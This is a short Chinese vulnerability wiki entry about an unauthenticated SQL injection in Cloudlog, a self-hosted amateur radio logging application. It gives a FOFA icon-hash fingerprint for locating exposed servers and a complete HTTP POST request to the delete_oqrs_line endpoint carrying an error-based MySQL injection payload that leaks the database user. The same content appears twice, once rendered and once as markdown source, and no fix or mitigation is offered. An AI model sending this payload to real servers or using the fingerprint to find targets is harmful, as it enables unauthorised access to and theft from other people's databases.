fofamini-wiki

登录白背景

源码

Cloudlog delete_oqrs_line存在未授权SQL注入漏洞

一、漏洞简介

Cloudlog 是一个自托管的 PHP 应用程序，可让您在任何地方记录您的业余无线电联系人。使用PHP和MySQL构建的基于Web的业余无线电记录应用程序支持从HF到微波的一般站记录任务。Cloudlog delete_oqrs_line存在未授权SQL注入漏洞

二、影响版本

Cloudlog

三、资产测绘

fofaicon_hash="-460032467"
特征

四、漏洞复现

POST /index.php/oqrs/delete_oqrs_line HTTP/1.1
Host: 
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36

id=GTID_SUBSET(CONCAT((MID((IFNULL(CAST(USER() AS NCHAR),0x20)),1,190))),666)

原文: https://www.yuque.com/xiaokp7/ocvun2/fu1tc0prbepxrr2l

# Cloudlog delete_oqrs_line存在未授权SQL注入漏洞

# 一、漏洞简介
Cloudlog 是一个自托管的 PHP 应用程序，可让您在任何地方记录您的业余无线电联系人。使用PHP和MySQL构建的基于Web的业余无线电记录应用程序支持从HF到微波的一般站记录任务。Cloudlog delete_oqrs_line存在未授权SQL注入漏洞

# 二、影响版本
+ Cloudlog

# 三、资产测绘
+ fofa`icon_hash="-460032467"`
+ 特征

![1729010893817-45409c20-b106-4990-8df8-23d6f8586896.png](./img/3O3jdUZgv_iVhx-g/1729010893817-45409c20-b106-4990-8df8-23d6f8586896-868711.png)

# 四、漏洞复现
```java
POST /index.php/oqrs/delete_oqrs_line HTTP/1.1
Host: 
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36

id=GTID_SUBSET(CONCAT((MID((IFNULL(CAST(USER() AS NCHAR),0x20)),1,190))),666)
```

![1729402867068-b649dbe0-2804-4e4d-a139-a8fbc67c4900.png](./img/3O3jdUZgv_iVhx-g/1729402867068-b649dbe0-2804-4e4d-a139-a8fbc67c4900-869226.png)

> 原文: <https://www.yuque.com/xiaokp7/ocvun2/fu1tc0prbepxrr2l>